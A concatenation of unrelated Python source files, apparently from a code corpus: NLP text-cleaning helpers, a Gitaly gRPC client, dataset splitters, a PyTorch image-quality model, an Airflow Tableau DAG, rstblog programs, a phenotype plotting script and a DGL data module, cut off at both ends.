string = (
re.sub(re.findall(r'\<a(.*?)\>', string)[0], '', string)
if (len(re.findall(r'\<a (.*?)\>', string)) > 0)
and ('href' in re.findall(r'\<a (.*?)\>', string)[0])
else string
)
string = re.sub(
r'\w+:\/{2}[\d\w-]+(\.[\d\w-]+)*(?:(?:\/[^\s/]*))*', ' ', string
)
string = re.sub(r'[ ]+', ' ', string).strip().split()
string = [w for w in string if w[0] != '@']
string = [w.title() if w[0].isupper() else w for w in string]
return ' '.join(string)
def malaya_textcleaning(string):
"""
    used by normalizer and spell correction
    remove links, hashtags, aliases
    only accept A-Z, a-z
    remove any laughing pattern
    remove any character repeated more than 2 times
    remove most nonsense words
"""
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[
word
for word in string.split()
if word.find('#') < 0 and word.find('@') < 0
]
),
)
string = unidecode(string).replace('.', '. ').replace(',', ' , ')
string = re.sub('[^\'"A-Za-z\- ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string.lower()).strip()
string = [word for word in string.lower().split() if _isWord(word)]
string = [
word
for word in string
if not any([laugh in word for laugh in laughing])
and word[: len(word) // 2] != word[len(word) // 2 :]
]
string = ' '.join(string)
string = (
''.join(''.join(s)[:2] for _, s in itertools.groupby(string))
).split()
return ' '.join([word for word in string if word not in STOPWORDS])
def normalizer_textcleaning(string):
"""
    used by normalizer and spell correction
    remove links, hashtags, aliases
    only accept A-Z, a-z
    remove any laughing pattern
    remove any character repeated more than 2 times
"""
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[
word
for word in string.split()
if word.find('#') < 0 and word.find('@') < 0
]
),
)
string = re.sub('[^A-Za-z ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
string = [
word.title() if word.isupper() else word
for word in string.split()
if len(word)
]
string = [
word
for word in string
if not any([laugh in word for laugh in laughing])
]
string = ' '.join(string)
return ''.join(''.join(s)[:2] for _, s in itertools.groupby(string))
def simple_textcleaning(string, lowering = True):
"""
    used by topic modelling
only accept A-Z, a-z
"""
string = unidecode(string)
string = re.sub('[^A-Za-z ]+', ' ', string)
return re.sub(r'[ ]+', ' ', string.lower() if lowering else string).strip()
def entities_textcleaning(string, lowering = True):
"""
    used by entity recognition, POS recognition and dependency parsing
"""
string = re.sub('[^A-Za-z0-9\-() ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
original_string = string.split()
if lowering:
string = string.lower()
string = [
(original_string[no], word.title() if word.isupper() else word)
for no, word in enumerate(string.split())
if len(word)
]
return [s[0] for s in string], [s[1] for s in string]
def summary_textcleaning(string):
original_string = string
string = re.sub('[^A-Za-z0-9\-\/\'"\.\, ]+', ' ', unidecode(string))
return original_string, re.sub(r'[ ]+', ' ', string.lower()).strip()
def get_hashtags(string):
return [hash.lower() for hash in re.findall('#(\w+)', string)]
def split_by_dot(string):
string = re.sub(
r'(?<!\d)\.(?!\d)',
'SPLITTT',
string.replace('\n', '').replace('/', ' '),
)
string = string.split('SPLITTT')
return [re.sub(r'[ ]+', ' ', sentence).strip() for sentence in string]
def language_detection_textcleaning(string):
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[i for i in string.split() if i.find('#') < 0 and i.find('@') < 0]
),
)
chars = ',.()!:\'"/;=-'
for c in chars:
string = string.replace(c, f' {c} ')
string = string.replace('\n', '').replace('\t', '')
string = re.sub(
'[0-9!@#$%^&*()_\-+{}|\~`\'";:?/.>,<]', ' ', string, flags = re.UNICODE
)
string = re.sub(r'[ ]+', ' ', string).strip()
return string.lower()
def pos_entities_textcleaning(string):
"""
    used by text entity and POS recognition
    remove links, hashtags, aliases
"""
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[i for i in string.split() if i.find('#') < 0 and i.find('@') < 0]
),
)
string = unidecode(string).replace('.', ' . ').replace(',', ' , ')
string = re.sub('[^A-Za-z\- ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
return ' '.join(
[
word.title() if word.isupper() else word
for word in string.split()
if len(word)
]
)
def classification_textcleaning(string, no_stopwords = False, lowering = True):
"""
    used by stemmer, summarization and topic modelling
    remove links, hashtags, aliases
"""
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[i for i in string.split() if i.find('#') < 0 and i.find('@') < 0]
),
)
string = unidecode(string).replace('.', ' . ').replace(',', ' , ')
string = re.sub('[^A-Za-z ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
if no_stopwords:
string = ' '.join(
[
i
for i in re.findall('[\\w\']+|[;:\-\(\)&.,!?"]', string)
if len(i)
]
)
else:
string = ' '.join(
[
i
for i in re.findall('[\\w\']+|[;:\-\(\)&.,!?"]', string)
if len(i) and i not in STOPWORDS
]
)
if lowering:
return string.lower()
else:
return ' '.join(
[
word.title() if word.isupper() else word
for word in string.split()
if len(word)
]
)
def separate_dataset(trainset):
datastring = []
datatarget = []
for i in range(len(trainset.data)):
data_ = trainset.data[i].split('\n')
data_ = list(filter(None, data_))
datastring += data_
for n in range(len(data_)):
datatarget.append(trainset.target[i])
return datastring, datatarget
def print_topics_modelling(
topics, feature_names, sorting, n_words = 20, return_df = True
):
if return_df:
try:
import pandas as pd
except:
raise Exception(
'pandas not installed. Please install it and try again or set `return_df = False`'
)
df = {}
for i in range(topics):
words = []
for k in range(n_words):
words.append(feature_names[sorting[i, k]])
df['topic %d' % (i)] = words
if return_df:
return pd.DataFrame.from_dict(df)
else:
return df
def str_idx(corpus, dic, maxlen, UNK = 0):
X = np.zeros((len(corpus), maxlen))
for i in range(len(corpus)):
for no, k in enumerate(corpus[i].split()[:maxlen][::-1]):
X[i, -1 - no] = dic.get(k, UNK)
return X
def stemmer_str_idx(corpus, dic, UNK = 3):
X = []
for i in corpus:
ints = []
for k in i:
ints.append(dic.get(k, UNK))
X.append(ints)
return X
def pad_sentence_batch(sentence_batch, pad_int):
padded_seqs = []
seq_lens = []
max_sentence_len = max([len(sentence) for sentence in sentence_batch])
for sentence in sentence_batch:
padded_seqs.append(
sentence + [pad_int] * (max_sentence_len - len(sentence))
)
seq_lens.append(len(sentence))
return padded_seqs, seq_lens
def char_str_idx(corpus, dic, UNK = 2):
maxlen = max([len(i) for i in corpus])
X = np.zeros((len(corpus), maxlen))
for i in range(len(corpus)):
for no, k in enumerate(corpus[i][:maxlen]):
X[i, no] = dic.get(k, UNK)
return X
def generate_char_seq(batch, dic, UNK = 2):
maxlen_c = max([len(k) for k in batch])
x = [[len(i) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((len(batch), maxlen_c, maxlen), dtype = np.int32)
for i in range(len(batch)):
for k in range(len(batch[i])):
for no, c in enumerate(batch[i][k][::-1]):
temp[i, k, -1 - no] = dic.get(c, UNK)
return temp
def build_dataset(words, n_words, included_prefix = True):
count = (
[['GO', 0], ['PAD', 1], ['EOS', 2], ['UNK', 3]]
if included_prefix
else []
)
count.extend(collections.Counter(words).most_common(n_words))
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary)
data = list()
for word in words:
index = dictionary.get(word, 3)
data.append(index)
reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reversed_dictionary
def multireplace(string, replacements):
substrs = sorted(replacements, key = len, reverse = True)
regexp = re.compile('|'.join(map(re.escape, substrs)))
return regexp.sub(lambda match: replacements[match.group(0)], string)
def case_of(text):
return (
str.upper
if text.isupper()
else str.lower
if text.islower()
else str.title
if text.istitle()
else str
)
alphabets = '([A-Za-z])'
prefixes = (
'(Mr|St|Mrs|Ms|Dr|Prof|Capt|Cpt|Lt|Mt|Puan|puan|Tuan|tuan|sir|Sir)[.]'
)
suffixes = '(Inc|Ltd|Jr|Sr|Co)'
starters = '(Mr|Mrs|Ms|Dr|He\s|She\s|It\s|They\s|Their\s|Our\s|We\s|But\s|However\s|That\s|This\s|Wherever|Dia|Mereka|Tetapi|Kita|Itu|Ini|Dan|Kami)'
acronyms = '([A-Z][.][A-Z][.](?:[A-Z][.])?)'
websites = '[.](com|net|org|io|gov|me|edu|my)'
another_websites = '(www|http|https)[.]'
digits = '([0-9])'
def split_into_sentences(text):
text = unidecode(text)
text = ' ' + text + ' '
text = text.replace('\n', ' ')
text = re.sub(prefixes, '\\1<prd>', text)
text = re.sub(websites, '<prd>\\1', text)
text = re.sub(another_websites, '\\1<prd>', text)
if '...' in text:
text = text.replace('...', '<prd><prd><prd>')
if 'Ph.D' in text:
text = text.replace('Ph.D.', 'Ph<prd>D<prd>')
text = re.sub('\s' + alphabets + '[.] ', ' \\1<prd> ', text)
text = re.sub(acronyms + ' ' + starters, '\\1<stop> \\2', text)
text = re.sub(
alphabets + '[.]' + alphabets + '[.]' + alphabets + '[.]',
'\\1<prd>\\2<prd>\\3<prd>',
text,
)
text = re.sub(
alphabets + '[.]' + alphabets + '[.]', '\\1<prd>\\2<prd>', text
)
text = re.sub(' ' + suffixes + '[.] ' + starters, ' \\1<stop> \\2', text)
text = re.sub(' ' + suffixes + '[.]', ' \\1<prd>', text)
text = re.sub(' ' + alphabets + '[.]', ' \\1<prd>', text)
text = re.sub(digits + '[.]' + digits, '\\1<prd>\\2', text)
if '”' in text:
text = text.replace('.”', '”.')
if '"' in text:
text = text.replace('."', '".')
if '!' in text:
text = text.replace('!"', '"!')
if '?' in text:
text = text.replace('?"', '"?')
text = text.replace('.', '.<stop>')
text = text.replace('?', '?<stop>')
text = text.replace('!', '!<stop>')
text = text.replace('<prd>', '.')
sentences = text.split('<stop>')
sentences = sentences[:-1]
sentences = [s.strip() for s in sentences if len(s) > 10]
return sentences
def end_of_chunk(prev_tag, tag):
if not len(prev_tag):
return False
if prev_tag != tag:
return True
def start_of_chunk(prev_tag, tag):
if not len(prev_tag):
return True
if prev_tag != tag:
return False
def tag_chunk(seq):
words = [i[0] for i in seq]
seq = [i[1] for i in seq]
prev_tag = ''
begin_offset = 0
chunks = []
for i, chunk in enumerate(seq):
if end_of_chunk(prev_tag, chunk):
chunks.append((prev_tag, begin_offset, i - 1))
prev_tag = ''
if start_of_chunk(prev_tag, chunk):
begin_offset = i
prev_tag = chunk
res = {'words': words, 'tags': []}
for chunk_type, chunk_start, chunk_end in chunks:
tag = {
'text': ' '.join(words[chunk_start : chunk_end + 1]),
'type': chunk_type,
'score': 1.0,
'beginOffset': chunk_start,
'endOffset': chunk_end,
}
res['tags'].append(tag)
return res
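# A minimal usage sketch of the sentence splitter above (the input sentence and
# the exact output are illustrative assumptions):
#
#   split_into_sentences("Dr. Aminah pergi ke K.L. pada 1.30 petang. Dia balik esok.")
#   # roughly -> ['Dr. Aminah pergi ke K.L. pada 1.30 petang.', 'Dia balik esok.']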
|
the-stack_106_23893 | import grpc
from .proto import (
ref_pb2, ref_pb2_grpc,
commit_pb2, commit_pb2_grpc,
blob_pb2_grpc,
)
from .proto import shared_pb2
from ..errors import GitlabArtifactsError
GITALY_ADDR = 'unix:/var/opt/gitlab/gitaly/gitaly.socket'
REF_PREFIX = 'refs/heads/'
def _gitaly_repo(project):
return shared_pb2.Repository(
storage_name=project.storage,
relative_path=project.disk_path,
gl_repository=project.gl_repository,
)
class GitalyClient():
def __init__(self, addr=GITALY_ADDR):
self.addr = addr
self._channel = None
self._refsvc = None
self._commitsvc = None
self._blobsvc = None
def __enter__(self):
self._channel = grpc.insecure_channel(self.addr)
self._refsvc = ref_pb2_grpc.RefServiceStub(self._channel)
self._commitsvc = commit_pb2_grpc.CommitServiceStub(self._channel)
self._blobsvc = blob_pb2_grpc.BlobServiceStub(self._channel)
return self
def __exit__(self, *args):
self._channel.close()
@staticmethod
def name_from_ref(ref):
if ref.lower().startswith(REF_PREFIX):
return ref[len(REF_PREFIX):]
return ref
def get_branches(self, project):
repository = _gitaly_repo(project)
request = ref_pb2.FindAllBranchesRequest(
repository=repository
)
branches = []
try:
# Gitaly "chunks?" responses at 20 items
# https://tinyurl.com/ycuazk7w
for page in self._refsvc.FindAllBranches(request):
for branch in page.branches:
ref = (
GitalyClient.name_from_ref(branch.name.decode('utf-8')),
branch.target.id,
)
branches.append(ref)
except grpc.RpcError as e:
raise GitlabArtifactsError(
'RefSvc.FindAllBranches for {} failed with error {}:{}'.format(
project.full_path,
e.code(),
e.details()
)
)
# Safety check for failed requests
if not branches:
raise GitlabArtifactsError(
'Gitaly returned no branches for {}'.format(
project.full_path
)
)
return branches
def get_tree_entry(self, ref, path):
repository = _gitaly_repo(ref.project)
request = commit_pb2.TreeEntryRequest(
repository=repository,
revision=ref.commit.encode('utf-8'),
path=path.encode('utf-8'),
limit=0,
)
try:
            # This should raise RpcError on a missing entry, but in practice it does not
response = list(self._commitsvc.TreeEntry(request))
except grpc.RpcError as e:
raise GitlabArtifactsError(
'CommitSvc.TreeEntry failed with error {}:{}'.format(
e.code(),
e.details()
)
)
# We should always get a response - it may be empty
if not response:
raise GitlabArtifactsError(
'CommitSvc.TreeEntry did not return a response')
first_entry = response[0]
# Ensure the first entry is type=BLOB, failed requests return type=COMMIT
if first_entry.type != 1:
return (None,)*3
return (
first_entry.oid,
first_entry.size,
b''.join(entry.data for entry in response)
)
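# A minimal usage sketch (assumes a `project` object exposing the attributes used
# above: storage, disk_path, gl_repository and full_path):
#
#   with GitalyClient() as gitaly:
#       branches = gitaly.get_branches(project)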
|
the-stack_106_23894 | #!/usr/bin/env python
# coding: utf-8
import os
import numpy as np
import argparse
from math import floor
def main(args):
# class foo(object):
# pass
# args = foo()
# args.ref='raw/training2017/REFERENCE.csv'
annot_lines = open(args.ref, 'r').read().splitlines()
np.random.shuffle(annot_lines)
annot_dict = {s: s.split(',')[1] for s in annot_lines}
index_dict = {'N': [], 'A': [], 'O': [], '~': []}
for idx, line in enumerate(annot_lines):
index_dict[annot_dict[line]].append(idx)
TRAIN = args.train / 100.
VAL = args.val / 100.
print('Sample in class/set:')
print('\tTotal,\tTrain,\tValid,\tTest')
for x in index_dict.items():
l = len(x[1])
hist = (x[0], l, floor(l * TRAIN), floor(l * VAL),
l - floor((TRAIN + VAL) * l))
print('%s,\t%d,\t%d,\t%d\t%d' % hist)
def fp(x): return os.path.normpath(os.path.dirname(args.ref) + '/' + x)
train_reference = open(fp('TRAIN.csv'), 'w')
validation_reference = open(fp('VALIDATION.csv'), 'w')
test_reference = open(fp('TEST.csv'), 'w')
for idxs in index_dict.values():
l = len(idxs)
train_reference.writelines(
'%s\n' % annot_lines[i] for i in idxs[:floor(l * TRAIN)])
validation_reference.writelines(
'%s\n' % annot_lines[i] for i in idxs[floor(l * TRAIN):floor(l * (TRAIN + VAL))])
test_reference.writelines(
'%s\n' % annot_lines[i] for i in idxs[floor(l * (TRAIN + VAL)):])
print('References written succesfully to:')
print(train_reference.name,
validation_reference.name,
test_reference.name,
sep='\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--ref', help='location of reference file',
default='./raw/training2017/REFERENCE.csv')
parser.add_argument(
'--train', help='percents of files from `--ref` to keep in train set',
type=int, default=80)
parser.add_argument(
'--val', help='percents of files from `--ref` to keep in val set',
type=int, default=10)
args = parser.parse_args()
main(args)
|
the-stack_106_23896 | import math
import torch.nn as nn
import torch.nn.functional as F
from GDN import Gdn
class EONSS(nn.Module):
def __init__(self):
super(EONSS, self).__init__()
self.conv1 = nn.Conv2d(3, 8, 5, stride=2, padding=2)
self.gdn1 = Gdn(8)
self.conv2 = nn.Conv2d(8, 16, 5, stride=2, padding=2)
self.gdn2 = Gdn(16)
self.conv3 = nn.Conv2d(16, 32, 5, stride=2, padding=2)
self.gdn3 = Gdn(32)
self.conv4 = nn.Conv2d(32, 64, 3, stride=1, padding=0)
self.gdn4 = Gdn(64)
self.st2_fc1 = nn.Conv2d(64, 256, 1, stride=1, padding=0)
self.st2_gdn1 = Gdn(256)
self.st2_fc2 = nn.Conv2d(256, 1, 1, stride=1, padding=0)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, Gdn):
m.gamma.data.fill_(1)
m.beta.data.fill_(1e-2)
def forward(self, x):
batch_size = x.size()[0]
x = F.max_pool2d(self.gdn1(self.conv1(x)), (2, 2))
x = F.max_pool2d(self.gdn2(self.conv2(x)), (2, 2))
x = F.max_pool2d(self.gdn3(self.conv3(x)), (2, 2))
x = F.max_pool2d(self.gdn4(self.conv4(x)), (2, 2))
y2 = self.st2_gdn1(self.st2_fc1(x))
s = self.st2_fc2(y2)
s = s.view(batch_size, -1)
return s
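# A minimal smoke-test sketch (assumes `import torch`; the 235x235 patch size is
# an assumption that survives the conv/pooling stack above and yields one score
# per patch):
#
#   model = EONSS()
#   scores = model(torch.randn(4, 3, 235, 235))   # -> shape (4, 1)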
|
the-stack_106_23897 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This is an example dag that performs two refresh operations on a Tableau Workbook aka Extract. The first one
waits until it succeeds. The second does not wait since this is an asynchronous operation and we don't know
when the operation actually finishes. That's why we have another task that checks only that.
"""
from datetime import timedelta
from airflow import DAG
from airflow.providers.tableau.operators.tableau import TableauOperator
from airflow.providers.tableau.sensors.tableau_job_status import TableauJobStatusSensor
from airflow.utils.dates import days_ago
DEFAULT_ARGS = {
'owner': 'airflow',
'depends_on_past': False,
'email': ['[email protected]'],
'email_on_failure': False,
'email_on_retry': False,
}
with DAG(
dag_id='example_tableau',
default_args=DEFAULT_ARGS,
dagrun_timeout=timedelta(hours=2),
schedule_interval=None,
start_date=days_ago(2),
tags=['example'],
) as dag:
# Refreshes a workbook and waits until it succeeds.
# [START howto_operator_tableau]
task_refresh_workbook_blocking = TableauOperator(
resource='workbooks',
method='refresh',
find='MyWorkbook',
match_with='name',
site_id='my_site',
blocking_refresh=True,
task_id='refresh_tableau_workbook_blocking',
)
# [END howto_operator_tableau]
# Refreshes a workbook and does not wait until it succeeds.
task_refresh_workbook_non_blocking = TableauOperator(
resource='workbooks',
method='refresh',
find='MyWorkbook',
match_with='name',
site_id='my_site',
blocking_refresh=False,
task_id='refresh_tableau_workbook_non_blocking',
)
# The following task queries the status of the workbook refresh job until it succeeds.
task_check_job_status = TableauJobStatusSensor(
site_id='my_site',
job_id="{{ ti.xcom_pull(task_ids='refresh_tableau_workbook_non_blocking') }}",
task_id='check_tableau_job_status',
)
task_refresh_workbook_non_blocking >> task_check_job_status
|
the-stack_106_23898 | #!/usr/bin/env python
"""
Created by howie.hu at 2021-04-08.
Description: extract titles from advertisement text to use as training samples
Changelog: all notable changes to this file will be documented
"""
import os
import time
import pandas as pd
from newspaper import Article
from src.config import Config
def csv2txt(target_path: str = ""):
"""
    Extract the titles from the ads CSV to use as advertisement samples
:param target_path:
:return:
"""
target_path = target_path or os.path.join(
Config.MODEL_DIR, f"cos/train.{int(time.time())}.txt"
)
ads_path = "../.files/datasets/ads.csv"
df = pd.read_csv(ads_path)
all_title = df["title"].drop_duplicates().values.tolist()
with open(target_path, "w") as fp:
for title in all_title:
fp.write(title + "\n")
print(f"{target_path} 写入成功,共 {len(all_title)} 条记录")
if __name__ == "__main__":
csv2txt()
# article = Article(
# "https://mp.weixin.qq.com/s/D-las20I8POTmWNaXradhw", language="zh"
# )
# article.download()
# article.parse()
# print(article.text)
# article.nlp()
# print(article.keywords)
# print(article.summary)
|
the-stack_106_23899 | # -*- coding: utf-8 -*-
"""
rstblog.programs
~~~~~~~~~~~~~~~~
Builtin build programs.
:copyright: (c) 2010 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import os
import yaml
import shutil
from datetime import datetime
from StringIO import StringIO
from weakref import ref
class Program(object):
def __init__(self, context):
self._context = ref(context)
@property
def context(self):
rv = self._context()
if rv is None:
raise RuntimeError('context went away, program is invalid')
return rv
def get_desired_filename(self):
folder, basename = os.path.split(self.context.source_filename)
simple_name = os.path.splitext(basename)[0]
if simple_name == 'index':
suffix = 'index.html'
else:
suffix = os.path.join(simple_name, 'index.html')
return os.path.join(folder, suffix)
def prepare(self):
pass
def render_contents(self):
return u''
def run(self):
raise NotImplementedError()
class CopyProgram(Program):
"""A program that copies a file over unchanged"""
def run(self):
self.context.make_destination_folder()
shutil.copy(self.context.full_source_filename,
self.context.full_destination_filename)
def get_desired_filename(self):
return self.context.source_filename
class TemplatedProgram(Program):
default_template = None
def get_template_context(self):
return {}
def run(self):
template_name = self.context.config.get('template') \
or self.default_template
context = self.get_template_context()
rv = self.context.render_template(template_name, context)
with self.context.open_destination_file() as f:
f.write(rv.encode('utf-8') + '\n')
class RSTProgram(TemplatedProgram):
"""A program that renders an rst file into a template"""
default_template = 'rst_display.html'
_fragment_cache = None
def prepare(self):
headers = ['---']
with self.context.open_source_file() as f:
for line in f:
line = line.rstrip()
if not line:
break
headers.append(line)
title = self.parse_text_title(f)
cfg = yaml.load(StringIO('\n'.join(headers)), Loader=yaml.FullLoader)
if cfg:
if not isinstance(cfg, dict):
raise ValueError('expected dict config in file "%s", got: %.40r' \
% (self.context.source_filename, cfg))
self.context.config = self.context.config.add_from_dict(cfg)
self.context.destination_filename = cfg.get(
'destination_filename',
self.context.destination_filename)
title_override = cfg.get('title')
if title_override is not None:
title = title_override
pub_date_override = cfg.get('pub_date')
if pub_date_override is not None:
if not isinstance(pub_date_override, datetime):
pub_date_override = datetime(pub_date_override.year,
pub_date_override.month,
pub_date_override.day)
self.context.pub_date = pub_date_override
summary_override = cfg.get('summary')
if summary_override is not None:
self.context.summary = summary_override
if title is not None:
self.context.title = title
def parse_text_title(self, f):
buffer = []
for line in f:
line = line.rstrip()
if not line:
break
buffer.append(line)
return self.context.render_rst('\n'.join(buffer).decode('utf-8')).get('title')
def get_fragments(self):
if self._fragment_cache is not None:
return self._fragment_cache
with self.context.open_source_file() as f:
while f.readline().strip():
pass
rv = self.context.render_rst(f.read().decode('utf-8'))
self._fragment_cache = rv
return rv
def render_contents(self):
return self.get_fragments()['fragment']
def get_template_context(self):
ctx = TemplatedProgram.get_template_context(self)
ctx['rst'] = self.get_fragments()
return ctx
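# RSTProgram parses an optional yaml header block at the top of each source file
# (all lines up to the first blank line), then treats the following reST block as
# the title, e.g. (an illustrative sketch, not a real post):
#
#   pub_date: 2010-01-01
#   summary: A short teaser
#
#   My Post Title
#   =============
#
#   Body text...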
|
the-stack_106_23901 | #!/usr/bin/env python3
import argparse
import pandas as pd
import numpy as np
import sys
import matplotlib
from matplotlib import use
use('Agg')
import matplotlib.pyplot as plt
EOL=chr(10)
def parseArguments():
if len(sys.argv)<=1:
sys.argv="mafplot.py $input $output".split()
parser=argparse.ArgumentParser()
parser.add_argument("--phenos", type=str, metavar='phenotypes', required=True)
parser.add_argument("--skip-zero", dest="skip_zero", action="store_true", default=False)
parser.add_argument('input', type=str, metavar='input'),
parser.add_argument('output', type=str, metavar='output'),
args = parser.parse_args()
return args
transforms = [[1,np.log1p],[np.sqrt,np.cbrt]]
transform_names = [["no transform","log transform"],["square root transform","cube root transform"]]
def numfrm(x):
xstr=str(x)
if "." not in xstr: return xstr
if x<0.1:
xstr="%6.4E"%x
else:
xstr = str(x)
xstr = xstr[:xstr.index(".")+3]
return xstr
def summary2LaTeX(summary,output,suf,pheno):
phelab = pheno.replace("_",":")
lat = EOL+EOL+\
r"\begin{table}[hb]"+EOL+\
r"\begin{center}"+EOL+r"\begin{tabular}{l r D{.}{.}{3} D{.}{.}{3} D{.}{.}{4} D{.}{.}{4}} \\"+EOL + \
r"Data & Count & \multicolumn{1}{c}{Min} & \multicolumn{1}{c}{Max} & \multicolumn{1}{c}{Ave} & \multicolumn{1}{c}{StdDev} \\\hline" +EOL
for s in summary:
lat = lat+" & ".join([s[0]]+list(map(numfrm,[s[1].count(),s[1].min(),s[1].max(),s[1].mean(),s[1].std()])))+ r"\\"+EOL
lat = lat + r"\hline\end{tabular}"+EOL+r"\end{center}"+EOL+(r"""
*-caption{Overview of phenotype *-protect*-url{%s} distribution}
*-label{tab:overview:%s}
*-end{table}
""")%(pheno,phelab)
lat = r"""
A summary of the data for \url{%s} can be found in the Table~*-ref{tab:overview:%s}, transformed using
different transforms. A histogram is found in Figure \ref{fig:%s}.
""" + lat + r"""
\ourfig{fig:%s}{Histogram of *-protect*-url{%s} values under different transforms}{%s.%s}
"""
return lat%(pheno,phelab,output,output,pheno,output,suf)
def errorMessage10(phe):
print("""
A problem has been detected in file <%s> column <%s>.
There is some invalid data. I regret I can't tell you which row.
Please check -- the data should be numeric only.
If there is missing data, please use NA
"""%(args.input,phe))
def showPheno(pname,frm):
if args.skip_zero:
data = frm[frm[pname]>0][pname]
else:
data = frm[pname]
fig,axs = plt.subplots(2,2)
matplotlib.rcParams['xtick.labelsize']=13
matplotlib.rcParams['ytick.labelsize']=13
summary=[]
for r in range(2):
for c in range(2):
axs[r][c].set_xlabel(transform_names[r][c],fontsize=12)
axs[r][c].set_ylabel("Frequency",fontsize=12)
fn = transforms[r][c]
try:
pdata = fn(data) if fn != 1 else data
pdata = pdata[pdata.notnull()]
summary.append((transform_names[r][c],pdata))
except:
errorMessage10(pname)
sys.exit(10)
axs[r][c].hist(pdata,bins=100)
plt.tight_layout()
output = ("%s-%s"%(args.output,pname)).replace("_","-")
plt.savefig("%s.pdf"%output)
return summary2LaTeX(summary,output,"pdf",pname)
args=parseArguments()
frm = pd.read_csv(args.input,delim_whitespace=True)
phenos = args.phenos.split(",")
output_latex= ""
for phen in phenos:
dets = phen.split("/")
pname = dets[0]
output_latex = output_latex + showPheno(pname,frm)
g = open("%s.tex"%args.output,"w")
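# "*-" and "##" are placeholders used in the LaTeX templates above for
# backslash (chr(92)) and dollar (chr(36)) respectively.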
g.write(output_latex.replace("*-",chr(92)).replace("##",chr(36)))
g.close()
|
the-stack_106_23902 | from os import path
from os.path import basename
from typing import List, Optional, Tuple
import dgl
import torch
from commode_utils.common import download_dataset
from commode_utils.vocabulary import build_from_scratch
from omegaconf import DictConfig
from pytorch_lightning import LightningDataModule
from torch.utils.data import DataLoader
from embeddings_for_trees.data.jsonl_dataset import JsonlASTDataset, JsonlTypedASTDataset
from embeddings_for_trees.data.vocabulary import Vocabulary, TypedVocabulary
class JsonlASTDatamodule(LightningDataModule):
_train = "train"
_val = "val"
_test = "test"
def __init__(self, config: DictConfig, data_folder: str, is_pointer: bool = False):
super().__init__()
self._config = config
self._data_folder = data_folder
self._name = basename(self._data_folder)
self._vocabulary = self.setup_vocabulary()
self._is_pointer = is_pointer
def prepare_data(self):
if path.exists(self._data_folder):
print(f"Dataset is already downloaded")
return
if "url" not in self._config:
raise ValueError(f"Config doesn't contain url for, can't download it automatically")
download_dataset(self._config.url, self._data_folder, self._name)
def setup_vocabulary(self) -> Vocabulary:
if not path.exists(path.join(self._data_folder, Vocabulary.vocab_filename)):
print("Can't find vocabulary, collect it from train holdout")
build_from_scratch(path.join(self._data_folder, f"{self._train}.jsonl"), Vocabulary)
vocabulary_path = path.join(self._data_folder, Vocabulary.vocab_filename)
return Vocabulary(vocabulary_path, self._config.labels_count, self._config.tokens_count)
@staticmethod
def _collate_batch(sample_list: List[Tuple[torch.Tensor, dgl.DGLGraph]]) -> Tuple[torch.Tensor, dgl.DGLGraph]:
labels, graphs = zip(*filter(lambda sample: sample is not None, sample_list))
return torch.cat(labels, dim=1), dgl.batch(graphs)
def _shared_dataloader(self, holdout: str, shuffle: bool) -> DataLoader:
if self._vocabulary is None:
raise RuntimeError(f"Setup vocabulary before creating data loaders")
holdout_file = path.join(self._data_folder, f"{holdout}.jsonl")
dataset = JsonlASTDataset(
holdout_file, self._vocabulary, self._config, holdout == self._train, self._is_pointer
)
batch_size = self._config.batch_size if holdout == self._train else self._config.test_batch_size
return DataLoader(
dataset, batch_size, shuffle=shuffle, num_workers=self._config.num_workers, collate_fn=self._collate_batch
)
def train_dataloader(self, *args, **kwargs) -> DataLoader:
return self._shared_dataloader(self._train, True)
def val_dataloader(self, *args, **kwargs) -> DataLoader:
return self._shared_dataloader(self._val, False)
def test_dataloader(self, *args, **kwargs) -> DataLoader:
return self._shared_dataloader(self._test, False)
def transfer_batch_to_device(
self, batch: Tuple[torch.Tensor, dgl.DGLGraph], device: torch.device, dataloader_idx: int
) -> Tuple[torch.Tensor, dgl.DGLGraph]:
return batch[0].to(device), batch[1].to(device)
@property
def vocabulary(self) -> Vocabulary:
if self._vocabulary is None:
raise RuntimeError(f"Setup data module for initializing vocabulary")
return self._vocabulary
class JsonlTypedASTDatamodule(JsonlASTDatamodule):
_vocabulary: TypedVocabulary
@property
def vocabulary(self) -> TypedVocabulary:
if self._vocabulary is None:
raise RuntimeError(f"Setup data module for initializing vocabulary")
return self._vocabulary
def setup_vocabulary(self) -> TypedVocabulary:
if not path.exists(path.join(self._data_folder, Vocabulary.vocab_filename)):
print("Can't find vocabulary, collect it from train holdout")
build_from_scratch(path.join(self._data_folder, f"{self._train}.jsonl"), TypedVocabulary)
vocabulary_path = path.join(self._data_folder, Vocabulary.vocab_filename)
return TypedVocabulary(
vocabulary_path, self._config.labels_count, self._config.tokens_count, self._config.types_count
)
def _shared_dataloader(self, holdout: str, shuffle: bool) -> DataLoader:
if self._vocabulary is None:
raise RuntimeError(f"Setup vocabulary before creating data loaders")
holdout_file = path.join(self._data_folder, f"{holdout}.jsonl")
